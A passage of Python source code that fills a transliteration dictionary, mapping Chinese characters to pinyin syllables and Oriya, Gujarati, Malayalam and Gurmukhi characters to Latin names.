u\"歼监坚尖笺间煎兼肩艰奸缄茧检柬碱硷拣捡简俭剪减荐槛鉴践贱见键箭件健舰剑饯渐溅涧建\":\n self.trans[char] = u\"jian\"\n for char in u\"僵姜将浆江疆蒋桨奖讲匠酱降\":\n self.trans[char] = u\"jiang\"\n for char in u\"蕉椒礁焦胶交郊浇骄娇嚼搅铰矫侥脚狡角饺缴绞剿教酵轿较叫窖\":\n self.trans[char] = u\"jiao\"\n for char in u\"揭接皆秸街阶截劫节桔杰捷睫竭洁结解姐戒藉芥界借介疥诫届\":\n self.trans[char] = u\"jie\"\n for char in u\"巾筋斤金今津襟紧锦仅谨进靳晋禁近烬浸尽劲\":\n self.trans[char] = u\"jin\"\n for char in u\"荆兢茎睛晶鲸京惊精粳经井警景颈静境敬镜径痉靖竟竞净\":\n self.trans[char] = u\"jing\"\n for char in u\"囧炯窘\":\n self.trans[char] = u\"jiong\"\n for char in u\"揪究纠玖韭久灸九酒厩救旧臼舅咎就疚\":\n self.trans[char] = u\"jiu\"\n for char in u\"鞠拘狙疽居驹菊局咀矩举沮聚拒据巨具距踞锯俱句惧炬剧\":\n self.trans[char] = u\"ju\"\n for char in u\"捐鹃娟倦眷卷绢\":\n self.trans[char] = u\"juan\"\n for char in u\"撅攫抉掘倔爵觉决诀绝\":\n self.trans[char] = u\"jue\"\n for char in u\"均菌钧军君峻俊竣浚郡骏\":\n self.trans[char] = u\"jun\"\n for char in u\"喀咖卡咯\":\n self.trans[char] = u\"ka\"\n for char in u\"开揩楷凯慨\":\n self.trans[char] = u\"kai\"\n for char in u\"刊堪勘坎砍看\":\n self.trans[char] = u\"kan\"\n for char in u\"康慷糠扛抗亢炕\":\n self.trans[char] = u\"kang\"\n for char in u\"考拷烤靠\":\n self.trans[char] = u\"kao\"\n for char in u\"坷苛柯棵磕颗科壳咳可渴克刻客课\":\n self.trans[char] = u\"ke\"\n for char in u\"肯啃垦恳\":\n self.trans[char] = u\"ken\"\n for char in u\"坑吭\":\n self.trans[char] = u\"keng\"\n for char in u\"空恐孔控\":\n self.trans[char] = u\"kong\"\n for char in u\"抠口扣寇\":\n self.trans[char] = u\"kou\"\n for char in u\"枯哭窟苦酷库裤\":\n self.trans[char] = u\"ku\"\n for char in u\"夸垮挎跨胯\":\n self.trans[char] = u\"kua\"\n for char in u\"块筷侩快\":\n self.trans[char] = u\"kuai\"\n for char in u\"宽款\":\n self.trans[char] = u\"kuan\"\n for char in u\"匡筐狂框矿眶旷况\":\n self.trans[char] = u\"kuang\"\n for char in u\"亏盔岿窥葵奎魁傀馈愧溃\":\n self.trans[char] = u\"kui\"\n for char in u\"坤昆捆困\":\n self.trans[char] = u\"kun\"\n for char in u\"括扩廓阔\":\n self.trans[char] = u\"kuo\"\n for char in u\"垃拉喇蜡腊辣啦\":\n self.trans[char] = u\"la\"\n for char in u\"莱来赖\":\n self.trans[char] = u\"lai\"\n for char in u\"蓝婪栏拦篮阑兰澜谰揽览懒缆烂滥\":\n self.trans[char] = u\"lan\"\n for char in u\"琅榔狼廊郎朗浪\":\n self.trans[char] = u\"lang\"\n for char in u\"捞劳牢老佬姥酪烙涝\":\n self.trans[char] = u\"lao\"\n for char in u\"勒乐\":\n self.trans[char] = u\"le\"\n for char in u\"雷镭蕾磊累儡垒擂肋类泪\":\n self.trans[char] = u\"lei\"\n for char in u\"棱楞冷\":\n self.trans[char] = u\"leng\"\n for char in u\"厘梨犁黎篱狸离漓理李里鲤礼莉荔吏栗丽厉励砾历利傈例俐痢立粒沥隶力璃哩\":\n self.trans[char] = u\"li\"\n self.trans['俩'] = 'lia'\n for char in u\"联莲连镰廉怜涟帘敛脸链恋炼练\":\n self.trans[char] = u\"lian\"\n for char in u\"粮凉梁粱良两辆量晾亮谅\":\n self.trans[char] = u\"liang\"\n for char in u\"撩聊僚疗燎寥辽潦了撂镣廖料\":\n self.trans[char] = u\"liao\"\n for char in u\"列裂烈劣猎\":\n self.trans[char] = u\"lie\"\n for char in u\"琳林磷霖临邻鳞淋凛赁吝拎\":\n self.trans[char] = u\"lin\"\n for char in u\"玲菱零龄铃伶羚凌灵陵岭领另令\":\n self.trans[char] = u\"ling\"\n for char in u\"溜琉榴硫馏留刘瘤流柳六\":\n self.trans[char] = u\"liu\"\n for char in u\"龙聋咙笼窿隆垄拢陇\":\n self.trans[char] = u\"long\"\n for char in u\"楼娄搂篓漏陋\":\n self.trans[char] = u\"lou\"\n for char in u\"芦卢颅庐炉掳卤虏鲁麓碌露路赂鹿潞禄录陆戮泸\":\n self.trans[char] = u\"lu\"\n for char in u\"峦挛孪滦卵乱\":\n self.trans[char] = u\"luan\"\n for char in u\"掠略\":\n self.trans[char] = u\"lue\"\n for char in u\"抡轮伦仑沦纶论\":\n self.trans[char] = u\"lun\"\n for char in u\"萝螺罗逻锣箩骡裸落洛骆络漯\":\n self.trans[char] = u\"luo\"\n for char in u\"驴吕铝侣旅履屡缕虑氯律率滤绿\":\n self.trans[char] = u\"lv\"\n for char in u\"妈麻玛码蚂马骂嘛吗\":\n self.trans[char] = u\"ma\"\n for char in u\"埋买麦卖迈脉\":\n self.trans[char] = u\"mai\"\n for char in u\"瞒馒蛮满蔓曼慢漫谩\":\n self.trans[char] = u\"man\"\n for char in u\"芒茫盲氓忙莽\":\n self.trans[char] = u\"mang\"\n for char in u\"猫茅锚毛矛铆卯茂冒帽貌贸\":\n self.trans[char] = u\"mao\"\n self.trans['么'] = 'me'\n for char in u\"玫枚梅酶霉煤没眉媒镁每美昧寐妹媚\":\n self.trans[char] = u\"mei\"\n for char in u\"门闷们\":\n self.trans[char] = u\"men\"\n for char in u\"萌蒙檬盟锰猛梦孟\":\n self.trans[char] = u\"meng\"\n for char in u\"眯醚靡糜迷谜弥米秘觅泌蜜密幂\":\n self.trans[char] = u\"mi\"\n for char in u\"棉眠绵冕免勉娩缅面\":\n self.trans[char] = u\"mian\"\n for char in u\"苗描瞄藐秒渺庙妙\":\n self.trans[char] = u\"miao\"\n for char in u\"蔑灭\":\n self.trans[char] = u\"mie\"\n for char in u\"民抿皿敏悯闽\":\n self.trans[char] = u\"min\"\n for char in u\"明螟鸣铭名命\":\n self.trans[char] = u\"ming\"\n self.trans['谬'] = 'miu'\n for char in u\"摸摹蘑模膜磨摩魔抹末莫墨默沫漠寞陌\":\n self.trans[char] = u\"mo\"\n for char in u\"谋牟某\":\n self.trans[char] = u\"mou\"\n for char in u\"拇牡亩姆母墓暮幕募慕木目睦牧穆\":\n self.trans[char] = u\"mu\"\n for char in u\"拿哪呐钠那娜纳\":\n self.trans[char] = u\"na\"\n for char in u\"氖乃奶耐奈\":\n self.trans[char] = u\"nai\"\n for char in u\"南男难\":\n self.trans[char] = u\"nan\"\n self.trans['囊'] = 'nang'\n for char in u\"挠脑恼闹淖\":\n self.trans[char] = u\"nao\"\n self.trans['呢'] = 'ne'\n for char in u\"馁内\":\n self.trans[char] = u\"nei\"\n self.trans['嫩'] = 'nen'\n self.trans['能'] = 'neng'\n for char in u\"妮霓倪泥尼拟你匿腻逆溺\":\n self.trans[char] = u\"ni\"\n for char in u\"蔫拈年碾撵捻念\":\n self.trans[char] = u\"nian\"\n for char in u\"娘酿\":\n self.trans[char] = u\"niang\"\n for char in u\"鸟尿\":\n self.trans[char] = u\"niao\"\n for char in u\"捏聂孽啮镊镍涅\":\n self.trans[char] = u\"nie\"\n self.trans['您'] = 'nin'\n for char in u\"柠狞凝宁拧泞\":\n self.trans[char] = u\"ning\"\n for char in u\"牛扭钮纽\":\n self.trans[char] = u\"niu\"\n for char in u\"脓浓农弄\":\n self.trans[char] = u\"nong\"\n for char in u\"奴努怒\":\n self.trans[char] = u\"nu\"\n self.trans['暖'] = 'nuan'\n for char in u\"虐疟\":\n self.trans[char] = u\"nue\"\n for char in u\"挪懦糯诺\":\n self.trans[char] = u\"nuo\"\n self.trans['女'] = 'nv'\n self.trans['哦'] = 'o'\n for char in u\"欧鸥殴藕呕偶沤\":\n self.trans[char] = u\"ou\"\n for char in u\"啪趴爬帕怕琶\":\n self.trans[char] = u\"pa\"\n for char in u\"拍排牌徘湃派\":\n self.trans[char] = u\"pai\"\n for char in u\"攀潘盘磐盼畔判叛\":\n self.trans[char] = u\"pan\"\n for char in u\"乓庞旁耪胖\":\n self.trans[char] = u\"pang\"\n for char in u\"抛咆刨炮袍跑泡\":\n self.trans[char] = u\"pao\"\n for char in u\"呸胚培裴赔陪配佩沛\":\n self.trans[char] = u\"pei\"\n for char in u\"喷盆\":\n self.trans[char] = u\"pen\"\n for char in u\"砰抨烹澎彭蓬棚硼篷膨朋鹏捧碰\":\n self.trans[char] = u\"peng\"\n for char in u\"坯砒霹批披劈琵毗啤脾疲皮匹痞僻屁譬\":\n self.trans[char] = u\"pi\"\n for char in u\"篇偏片骗\":\n self.trans[char] = u\"pian\"\n for char in u\"飘漂瓢票\":\n self.trans[char] = u\"piao\"\n for char in u\"撇瞥\":\n self.trans[char] = u\"pie\"\n for char in u\"拼频贫品聘\":\n self.trans[char] = u\"pin\"\n for char in u\"乒坪苹萍平凭瓶评屏\":\n self.trans[char] = u\"ping\"\n for char in u\"坡泼颇婆破魄迫粕剖\":\n self.trans[char] = u\"po\"\n for char in u\"扑铺仆莆葡菩蒲埔朴圃普浦谱曝瀑濮\":\n self.trans[char] = u\"pu\"\n for char in u\"期欺栖戚妻七凄漆柒沏其棋奇歧畦崎脐齐旗祈祁骑起岂乞企启契砌器气迄弃汽泣讫\":\n self.trans[char] = u\"qi\"\n for char in u\"掐恰洽\":\n self.trans[char] = u\"qia\"\n for char in u\"牵扦钎铅千迁签仟谦乾黔钱钳前潜遣浅谴堑嵌欠歉\":\n self.trans[char] = u\"qian\"\n for char in u\"枪呛腔羌墙蔷强抢\":\n self.trans[char] = u\"qiang\"\n for char in u\"橇锹敲悄桥瞧乔侨巧鞘撬翘峭俏窍\":\n self.trans[char] = u\"qiao\"\n for char in u\"切茄且怯窃\":\n self.trans[char] = u\"qie\"\n for char in u\"钦侵亲秦琴勤芹擒禽寝沁\":\n self.trans[char] = u\"qin\"\n for char in u\"青轻氢倾卿清擎晴氰情顷请庆\":\n self.trans[char] = u\"qing\"\n for char in u\"琼穷\":\n self.trans[char] = u\"qiong\"\n for char in u\"秋丘邱球求囚酋泅\":\n self.trans[char] = u\"qiu\"\n for char in u\"趋区蛆曲躯屈驱渠取娶龋趣去\":\n self.trans[char] = u\"qu\"\n for char in u\"圈颧权醛泉全痊拳犬券劝\":\n self.trans[char] = u\"quan\"\n for char in u\"缺炔瘸却鹊榷确雀\":\n self.trans[char] = u\"que\"\n for char in u\"裙群\":\n self.trans[char] = u\"qun\"\n for char in u\"然燃冉染\":\n self.trans[char] = u\"ran\"\n for char in u\"瓤壤攘嚷让\":\n self.trans[char] = u\"rang\"\n for char in u\"饶扰绕\":\n self.trans[char] = u\"rao\"\n for char in u\"惹热\":\n self.trans[char] = u\"re\"\n for char in u\"壬仁人忍韧任认刃妊纫\":\n self.trans[char] = u\"ren\"\n for char in u\"扔仍\":\n self.trans[char] = u\"reng\"\n self.trans['日'] = 'ri'\n for char in u\"戎茸蓉荣融熔溶容绒冗\":\n self.trans[char] = u\"rong\"\n for char in u\"揉柔肉\":\n self.trans[char] = u\"rou\"\n for char in u\"茹蠕儒孺如辱乳汝入褥\":\n self.trans[char] = u\"ru\"\n for char in u\"软阮\":\n self.trans[char] = u\"ruan\"\n for char in u\"蕊瑞锐\":\n self.trans[char] = u\"rui\"\n for char in u\"闰润\":\n self.trans[char] = u\"run\"\n for char in u\"若弱\":\n self.trans[char] = u\"ruo\"\n for char in u\"撒洒萨\":\n self.trans[char] = u\"sa\"\n for char in u\"腮鳃塞赛\":\n self.trans[char] = u\"sai\"\n for char in u\"三叁伞散\":\n self.trans[char] = u\"san\"\n for char in u\"桑嗓丧\":\n self.trans[char] = u\"sang\"\n for char in u\"搔骚扫嫂\":\n self.trans[char] = u\"sao\"\n for char in u\"瑟色涩\":\n self.trans[char] = u\"se\"\n self.trans['森'] = 'sen'\n self.trans['僧'] = 'seng'\n for char in u\"莎砂杀刹沙纱傻啥煞\":\n self.trans[char] = u\"sha\"\n for char in u\"筛晒\":\n self.trans[char] = u\"shai\"\n for char in u\"珊苫杉山删煽衫闪陕擅赡膳善汕扇缮\":\n self.trans[char] = u\"shan\"\n for char in u\"墒伤商赏晌上尚裳\":\n self.trans[char] = u\"shang\"\n for char in u\"梢捎稍烧芍勺韶少哨邵绍\":\n self.trans[char] = u\"shao\"\n for char in u\"奢赊蛇舌舍赦摄射慑涉社设\":\n self.trans[char] = u\"she\"\n for char in u\"砷申呻伸身深娠绅神沈审婶甚肾慎渗\":\n self.trans[char] = u\"shen\"\n for char in u\"声生甥牲升绳省盛剩胜圣\":\n self.trans[char] = u\"sheng\"\n for char in u\"师失狮施湿诗尸虱十石拾时什食蚀实识史矢使屎驶始式示士世柿事拭誓逝势是嗜噬适仕侍释饰氏市恃室视试\":\n self.trans[char] = u\"shi\"\n for char in u\"收手首守寿授售受瘦兽\":\n self.trans[char] = u\"shou\"\n for char in u\"蔬枢梳殊抒输叔舒淑疏书赎孰熟薯暑曙署蜀黍鼠属术述树束戍竖墅庶数漱恕\":\n self.trans[char] = u\"shu\"\n for char in u\"刷耍\":\n self.trans[char] = u\"shua\"\n for char in u\"摔衰甩帅\":\n self.trans[char] = u\"shuai\"\n for char in u\"栓拴\":\n self.trans[char] = u\"shuan\"\n for char in u\"霜双爽\":\n self.trans[char] = u\"shuang\"\n for char in u\"谁水睡税\":\n self.trans[char] = u\"shui\"\n for char in u\"吮瞬顺舜\":\n self.trans[char] = u\"shun\"\n for char in u\"说硕朔烁\":\n self.trans[char] = u\"shuo\"\n for char in u\"斯撕嘶思私司丝死肆寺嗣四伺似饲巳\":\n self.trans[char] = u\"si\"\n for char in u\"松耸怂颂送宋讼诵\":\n self.trans[char] = u\"song\"\n for char in u\"搜艘擞\":\n self.trans[char] = u\"sou\"\n for char in u\"嗽苏酥俗素速粟僳塑溯宿诉肃\":\n self.trans[char] = u\"su\"\n for char in u\"酸蒜算\":\n self.trans[char] = u\"suan\"\n for char in u\"虽隋随绥髓碎岁穗遂隧祟\":\n self.trans[char] = u\"sui\"\n for char in u\"孙损笋\":\n self.trans[char] = u\"sun\"\n for char in u\"蓑梭唆缩琐索锁所\":\n self.trans[char] = u\"suo\"\n for char in u\"塌他它她塔獭挞蹋踏\":\n self.trans[char] = u\"ta\"\n for char in u\"胎苔抬台泰酞太态汰\":\n self.trans[char] = u\"tai\"\n for char in u\"坍摊贪瘫滩坛檀痰潭谭谈坦毯袒碳探叹炭\":\n self.trans[char] = u\"tan\"\n for char in u\"汤塘搪堂棠膛唐糖倘躺淌趟烫\":\n self.trans[char] = u\"tang\"\n for char in u\"掏涛滔绦萄桃逃淘陶讨套\":\n self.trans[char] = u\"tao\"\n self.trans['特'] = 'te'\n for char in u\"藤腾疼誊\":\n self.trans[char] = u\"teng\"\n for char in u\"梯剔踢锑提题蹄啼体替嚏惕涕剃屉\":\n self.trans[char] = u\"ti\"\n for char in u\"兲天添填田甜恬舔腆\":\n self.trans[char] = u\"tian\"\n for char in u\"挑条迢眺跳\":\n self.trans[char] = u\"tiao\"\n for char in u\"贴铁帖\":\n self.trans[char] = u\"tie\"\n for char in u\"厅听烃汀廷停亭庭挺艇\":\n self.trans[char] = u\"ting\"\n for char in u\"通桐酮瞳同铜彤童桶捅筒统痛\":\n self.trans[char] = u\"tong\"\n for char in u\"偷投头透\":\n self.trans[char] = u\"tou\"\n for char in u\"凸秃突图徒途涂屠土吐兔\":\n self.trans[char] = u\"tu\"\n for char in u\"湍团\":\n self.trans[char] = u\"tuan\"\n for char in u\"推颓腿蜕褪退\":\n self.trans[char] = u\"tui\"\n for char in u\"吞屯臀\":\n self.trans[char] = u\"tun\"\n for char in u\"拖托脱鸵陀驮驼椭妥拓唾\":\n self.trans[char] = u\"tuo\"\n for char in u\"挖哇蛙洼娃瓦袜\":\n self.trans[char] = u\"wa\"\n for char in u\"歪外\":\n self.trans[char] = u\"wai\"\n for char in u\"豌弯湾玩顽丸烷完碗挽晚皖惋宛婉万腕莞\":\n self.trans[char] = u\"wan\"\n for char in u\"汪王亡枉网往旺望忘妄\":\n self.trans[char] = u\"wang\"\n for char in u\"威巍微危韦违桅围唯惟为潍维苇萎委伟伪尾纬未蔚味畏胃喂魏位渭谓尉慰卫\":\n self.trans[char] = u\"wei\"\n for char in u\"瘟温蚊文闻纹吻稳紊问\":\n self.trans[char] = u\"wen\"\n for char in u\"嗡翁瓮\":\n self.trans[char] = u\"weng\"\n for char in u\"挝蜗涡窝我斡卧握沃\":\n self.trans[char] = u\"wo\"\n for char in u\"巫呜钨乌污诬屋无芜梧吾吴毋武五捂午舞伍侮坞戊雾晤物勿务悟误\":\n self.trans[char] = u\"wu\"\n for char in u\"昔熙析西硒矽晰嘻吸锡牺稀息希悉膝夕惜熄烯溪汐犀檄袭席习媳喜铣洗系隙戏细\":\n self.trans[char] = u\"xi\"\n for char in u\"瞎虾匣霞辖暇峡侠狭下厦夏吓\":\n self.trans[char] = u\"xia\"\n for char in u\"掀锨先仙鲜纤咸贤衔舷闲涎弦嫌显险现献县腺馅羡宪陷限线\":\n self.trans[char] = u\"xian\"\n for char in u\"相厢镶香箱襄湘乡翔祥详想响享项巷橡像向象\":\n self.trans[char] = u\"xiang\"\n for char in u\"萧硝霄削哮嚣销消宵淆晓小孝校肖啸笑效\":\n self.trans[char] = u\"xiao\"\n for char in u\"楔些歇蝎鞋协挟携邪斜胁谐写械卸蟹懈泄泻谢屑\":\n self.trans[char] = u\"xie\"\n for char in u\"薪芯锌欣辛新忻心信衅\":\n self.trans[char] = u\"xin\"\n for char in u\"星腥猩惺兴刑型形邢行醒幸杏性姓\":\n self.trans[char] = u\"xing\"\n for char in u\"兄凶胸匈汹雄熊\":\n self.trans[char] = u\"xiong\"\n for char in u\"休修羞朽嗅锈秀袖绣\":\n self.trans[char] = u\"xiu\"\n for char in u\"墟戌需虚嘘须徐许蓄酗叙旭序畜恤絮婿绪续\":\n self.trans[char] = u\"xu\"\n for char in u\"轩喧宣悬旋玄选癣眩绚\":\n self.trans[char] = u\"xuan\"\n for char in u\"靴薛学穴雪血\":\n self.trans[char] = u\"xue\"\n for char in u\"勋熏循旬询寻驯巡殉汛训讯逊迅\":\n self.trans[char] = u\"xun\"\n for char in u\"压押鸦鸭呀丫芽牙蚜崖衙涯雅哑亚讶\":\n self.trans[char] = u\"ya\"\n for char in u\"焉咽阉烟淹盐严研蜒岩延言颜阎炎沿奄掩眼衍演艳堰燕厌砚雁唁彦焰宴谚验\":\n self.trans[char] = u\"yan\"\n for char in u\"殃央鸯秧杨扬佯疡羊洋阳氧仰痒养样漾\":\n self.trans[char] = u\"yang\"\n for char in u\"邀腰妖瑶摇尧遥窑谣姚咬舀药要耀\":\n self.trans[char] = u\"yao\"\n for char in u\"椰噎耶爷野冶也页掖业叶曳腋夜液\":\n self.trans[char] = u\"ye\"\n for char in u\"一壹医揖铱依伊衣颐夷遗移仪胰疑沂宜姨彝椅蚁倚已乙矣以艺抑易邑屹亿役臆逸肄疫亦裔意毅忆义益溢诣议谊译异翼翌绎\":\n self.trans[char] = u\"yi\"\n for char in u\"茵荫因殷音阴姻吟银淫寅饮尹引隐印\":\n self.trans[char] = u\"yin\"\n for char in u\"英樱婴鹰应缨莹萤营荧蝇迎赢盈影颖硬映\":\n self.trans[char] = u\"ying\"\n self.trans['哟'] = 'yo'\n for char in u\"拥佣臃痈庸雍踊蛹咏泳涌永恿勇用\":\n self.trans[char] = u\"yong\"\n for char in u\"幽优悠忧尤由邮铀犹油游酉有友右佑釉诱又幼迂\":\n self.trans[char] = u\"you\"\n for char in u\"淤于盂榆虞愚舆余俞逾鱼愉渝渔隅予娱雨与屿禹宇语羽玉域芋郁吁遇喻峪御愈欲狱育誉浴寓裕预豫驭\":\n self.trans[char] = u\"yu\"\n for char in u\"鸳渊冤元垣袁原援辕园员圆猿源缘远苑愿怨院\":\n self.trans[char] = u\"yuan\"\n for char in u\"曰约越跃钥岳粤月悦阅\":\n self.trans[char] = u\"yue\"\n for char in u\"耘云郧匀陨允运蕴酝晕韵孕\":\n self.trans[char] = u\"yun\"\n for char in u\"匝砸杂\":\n self.trans[char] = u\"za\"\n for char in u\"栽哉灾宰载再在\":\n self.trans[char] = u\"zai\"\n for char in u\"咱攒暂赞\":\n self.trans[char] = u\"zan\"\n for char in u\"赃脏葬\":\n self.trans[char] = u\"zang\"\n for char in u\"遭糟凿藻枣早澡蚤躁噪造皂灶燥\":\n self.trans[char] = u\"zao\"\n for char in u\"责择则泽\":\n self.trans[char] = u\"ze\"\n self.trans['贼'] = 'zei'\n self.trans['怎'] = 'zen'\n for char in u\"增憎曾赠\":\n self.trans[char] = u\"zeng\"\n for char in u\"扎喳渣札轧铡闸眨栅榨咋乍炸诈\":\n self.trans[char] = u\"zha\"\n for char in u\"摘斋宅窄债寨\":\n self.trans[char] = u\"zhai\"\n for char in u\"瞻毡詹粘沾盏斩辗崭展蘸栈占战站湛绽\":\n self.trans[char] = u\"zhan\"\n for char in u\"樟章彰漳张掌涨杖丈帐账仗胀瘴障\":\n self.trans[char] = u\"zhang\"\n for char in u\"招昭找沼赵照罩兆肇召\":\n self.trans[char] = u\"zhao\"\n for char in u\"遮折哲蛰辙者锗蔗这浙\":\n self.trans[char] = u\"zhe\"\n for char in u\"珍斟真甄砧臻贞针侦枕疹诊震振镇阵圳\":\n self.trans[char] = u\"zhen\"\n for char in u\"蒸挣睁征狰争怔整拯正政帧症郑证\":\n self.trans[char] = u\"zheng\"\n for char in u\"芝枝支吱蜘知肢脂汁之织职直植殖执值侄址指止趾只旨纸志挚掷至致置帜峙制智秩稚质炙痔滞治窒\":\n self.trans[char] = u\"zhi\"\n for char in u\"中盅忠钟衷终种肿重仲众\":\n self.trans[char] = u\"zhong\"\n for char in u\"舟周州洲诌粥轴肘帚咒皱宙昼骤\":\n self.trans[char] = u\"zhou\"\n for char in u\"珠株蛛朱猪诸诛逐竹烛煮拄瞩嘱主著柱助蛀贮铸筑住注祝驻\":\n self.trans[char] = u\"zhu\"\n for char in u\"抓爪\":\n self.trans[char] = u\"zhua\"\n self.trans['拽'] = 'zhuai'\n for char in u\"专砖转撰赚篆\":\n self.trans[char] = u\"zhuan\"\n for char in u\"桩庄装妆撞壮状\":\n self.trans[char] = u\"zhuang\"\n for char in u\"椎锥追赘坠缀\":\n self.trans[char] = u\"zhui\"\n for char in u\"谆准\":\n self.trans[char] = u\"zhun\"\n for char in u\"捉拙卓桌琢茁酌啄着灼浊\":\n self.trans[char] = u\"zhuo\"\n for char in u\"兹咨资姿滋淄孜紫仔籽滓子自渍字\":\n self.trans[char] = u\"zi\"\n for char in u\"鬃棕踪宗综总纵\":\n self.trans[char] = u\"zong\"\n for char in u\"邹走奏揍\":\n self.trans[char] = u\"zou\"\n for char in u\"租足卒族祖诅阻组\":\n self.trans[char] = u\"zu\"\n for char in u\"钻纂\":\n self.trans[char] = u\"zuan\"\n for char in u\"嘴醉最罪\":\n self.trans[char] = u\"zui\"\n for char in u\"尊遵\":\n self.trans[char] = u\"zun\"\n for char in u\"昨左佐柞做作坐座\":\n self.trans[char] = u\"zuo\"\n # from: https://www.wikidata.org/wiki/MediaWiki:Gadget-SimpleTransliterate.js\n self.trans[u\"ଂ\"] = \"anusvara\"\n self.trans[u\"ઇ\"] = \"i\"\n self.trans[u\"എ\"] = \"e\"\n self.trans[u\"ગ\"] = \"ga\"\n self.trans[u\"ਜ\"] = \"ja\"\n self.trans[u\"ഞ\"] = \"nya\"\n self.trans[u\"ଢ\"] = \"ddha\"\n self.trans[u\"ધ\"] = \"dha\"\n self.trans[u\"ਬ\"] = \"ba\"\n self.trans[u\"മ\"] = \"ma\"\n self.trans[u\"ଲ\"] = \"la\"\n self.trans[u\"ષ\"] = \"ssa\"\n self.trans[u\"਼\"] = \"nukta\"\n self.trans[u\"ാ\"] = \"aa\"\n self.trans[u\"ୂ\"] = \"uu\"\n self.trans[u\"ે\"] = \"e\"\n self.trans[u\"ੌ\"] = \"au\"\n self.trans[u\"ൎ\"] = \"reph\"\n self.trans[u\"ੜ\"] = \"rra\"\n self.trans[u\"՞\"] = \"?\"\n self.trans[u\"ୢ\"] = \"l\"\n self.trans[u\"૧\"] = \"1\"\n self.trans[u\"੬\"] = \"6\"\n self.trans[u\"൮\"] = \"8\"\n self.trans[u\"୲\"] = \"quarter\"\n self.trans[u\"ൾ\"] = \"ll\"\n self.trans[u\"ਇ\"] = \"i\"\n self.trans[u\"ഉ\"] = \"u\"\n self.trans[u\"ઌ\"] = \"l\"\n self.trans[u\"ਗ\"] = \"ga\"\n self.trans[u\"ങ\"] = \"nga\"\n self.trans[u\"ଝ\"] = \"jha\"\n self.trans[u\"જ\"] = \"ja\"\n self.trans[u\"؟\"] = \"?\"\n self.trans[u\"ਧ\"] = \"dha\"\n self.trans[u\"ഩ\"] = \"nnna\"\n self.trans[u\"ଭ\"] = \"bha\"\n self.trans[u\"બ\"] = \"ba\"\n self.trans[u\"ഹ\"] = \"ha\"\n self.trans[u\"ଽ\"] = \"avagraha\"\n self.trans[u\"઼\"] = \"nukta\"\n self.trans[u\"ੇ\"] = \"ee\"\n self.trans[u\"୍\"] = \"virama\"\n self.trans[u\"ૌ\"] = \"au\"\n self.trans[u\"੧\"] = \"1\"\n self.trans[u\"൩\"] = \"3\"\n self.trans[u\"୭\"] = \"7\"\n self.trans[u\"૬\"] = \"6\"\n self.trans[u\"൹\"] = \"mark\"\n self.trans[u\"ਖ਼\"] = \"khha\"\n self.trans[u\"ਂ\"] = \"bindi\"\n self.trans[u\"ഈ\"] = \"ii\"\n self.trans[u\"ઍ\"] = \"e\"\n self.trans[u\"ଌ\"] = \"l\"\n self.trans[u\"ഘ\"] = \"gha\"\n self.trans[u\"ઝ\"] = \"jha\"\n self.trans[u\"ଡ଼\"] = \"rra\"\n self.trans[u\"ਢ\"] = \"ddha\"\n self.trans[u\"ന\"] = \"na\"\n self.trans[u\"ભ\"] = \"bha\"\n self.trans[u\"ବ\"] = \"ba\"\n self.trans[u\"ਲ\"] = \"la\"\n self.trans[u\"സ\"] = \"sa\"\n self.trans[u\"ઽ\"] = \"avagraha\"\n self.trans[u\"଼\"] = \"nukta\"\n self.trans[u\"ੂ\"] = \"uu\"\n self.trans[u\"ൈ\"] = \"ai\"\n self.trans[u\"્\"] = \"virama\"\n self.trans[u\"ୌ\"] = \"au\"\n self.trans[u\"൨\"] = \"2\"\n self.trans[u\"૭\"] = \"7\"\n self.trans[u\"୬\"] = \"6\"\n self.trans[u\"ੲ\"] = \"iri\"\n self.trans[u\"ഃ\"] = \"visarga\"\n self.trans[u\"ં\"] = \"anusvara\"\n self.trans[u\"ଇ\"] = \"i\"\n self.trans[u\"ഓ\"] = \"oo\"\n self.trans[u\"ଗ\"] = \"ga\"\n self.trans[u\"ਝ\"] = \"jha\"\n self.trans[u\"?\"] = \"?\"\n self.trans[u\"ണ\"] = \"nna\"\n self.trans[u\"ઢ\"] = \"ddha\"\n self.trans[u\"ଧ\"] = \"dha\"\n self.trans[u\"ਭ\"] = \"bha\"\n self.trans[u\"ള\"] = \"lla\"\n self.trans[u\"લ\"] = \"la\"\n self.trans[u\"ଷ\"] = \"ssa\"\n self.trans[u\"ൃ\"] = \"r\"\n self.trans[u\"ૂ\"] = \"uu\"\n self.trans[u\"େ\"] = \"e\"\n self.trans[u\"੍\"] = \"virama\"\n self.trans[u\"ୗ\"] = \"mark\"\n self.trans[u\"ൣ\"] = \"ll\"\n self.trans[u\"ૢ\"] = \"l\"\n self.trans[u\"୧\"] = \"1\"\n self.trans[u\"੭\"] = \"7\"\n self.trans[u\"൳\"] = \"1/4\"\n self.trans[u\"୷\"] = \"sixteenths\"\n self.trans[u\"ଆ\"] = \"aa\"\n self.trans[u\"ઋ\"] = \"r\"\n self.trans[u\"ഊ\"] = \"uu\"\n self.trans[u\"ਐ\"] = \"ai\"\n self.trans[u\"ଖ\"] = \"kha\"\n self.trans[u\"છ\"] = \"cha\"\n self.trans[u\"ച\"] = \"ca\"\n self.trans[u\"ਠ\"] = \"ttha\"\n self.trans[u\"ଦ\"] = \"da\"\n self.trans[u\"ફ\"] = \"pha\"\n self.trans[u\"പ\"] = \"pa\"\n self.trans[u\"ਰ\"] = \"ra\"\n self.trans[u\"ଶ\"] = \"sha\"\n self.trans[u\"ഺ\"] = \"ttta\"\n self.trans[u\"ੀ\"] = \"ii\"\n self.trans[u\"ો\"] = \"o\"\n self.trans[u\"ൊ\"] = \"o\"\n self.trans[u\"ୖ\"] = \"mark\"\n self.trans[u\"୦\"] = \"0\"\n self.trans[u\"૫\"] = \"5\"\n self.trans[u\"൪\"] = \"4\"\n self.trans[u\"ੰ\"] = \"tippi\"\n self.trans[u\"୶\"] = \"eighth\"\n self.trans[u\"ൺ\"] = \"nn\"\n self.trans[u\"ଁ\"] = \"candrabindu\"\n self.trans[u\"അ\"] = \"a\"\n self.trans[u\"ઐ\"] = \"ai\"\n self.trans[u\"ക\"] = \"ka\"\n self.trans[u\"ਸ਼\"] = \"sha\"\n self.trans[u\"ਛ\"] = \"cha\"\n self.trans[u\"ଡ\"] = \"dda\"\n self.trans[u\"ઠ\"] = \"ttha\"\n self.trans[u\"ഥ\"] = \"tha\"\n self.trans[u\"ਫ\"] = \"pha\"\n self.trans[u\"ર\"] = \"ra\"\n self.trans[u\"വ\"] = \"va\"\n self.trans[u\"ୁ\"] = \"u\"\n self.trans[u\"ી\"] = \"ii\"\n self.trans[u\"ੋ\"] = \"oo\"\n self.trans[u\"ૐ\"] = \"om\"\n 